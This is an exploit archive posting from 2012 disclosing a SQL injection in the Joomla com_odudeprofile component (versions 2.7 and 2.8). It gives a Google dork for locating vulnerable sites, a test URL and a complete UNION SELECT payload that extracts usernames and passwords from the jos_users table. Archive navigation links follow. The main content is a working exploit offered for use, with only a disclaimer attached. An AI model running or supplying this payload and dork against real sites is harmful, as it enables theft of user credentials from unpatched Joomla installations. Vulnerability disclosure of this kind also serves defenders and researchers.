Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection: Posted Jul 25, 2012; Authored by Daniel Barragan; Joomla Odudeprofile component version 2.x suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8b5536a92abeb5455576bdcda4e58fb09ea7f7b74b19c495050cdfec88ce5f79; Download | Favorite | View

Joomla Odudeprofile 2.x SQL Injection

______________________________________________________________________________________
 
 Exploit Title: Joomla com_odudeprofile V2.x Exploit

 Google Dork: inurl:index.php?option=com_odudeprofile

 Date: [24-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://poisonsecurity.wordpress.com/

 Vendor: http://www.odude.com

 Version: 2.7 & 2.8

 Download: http://www.odude.com/home/profile.html

 License: Non-Commercial
 
 Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

  Test:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27

    
  Sql:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) 


      DEMO1:

                     http://example.com/index.php?option=com_odudeprofile&view=search&profession=999999.9'%20union%20all%20select%20 0x31303235343830303536%2C(select%20concat(username,0x3D,password)%20from%20jos_users)%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20


     


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"

Top Authors In Last 30 Days

Red Hat 223 files
indoushka 170 files
Jay Turla 150 files
Ubuntu 79 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,177)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,794)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,845)
UNIX (9,454)
UnixWare (188)
Windows (6,771)
Other

Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Odudeprofile 2.x SQL Injection

Share This

Joomla Odudeprofile 2.x SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems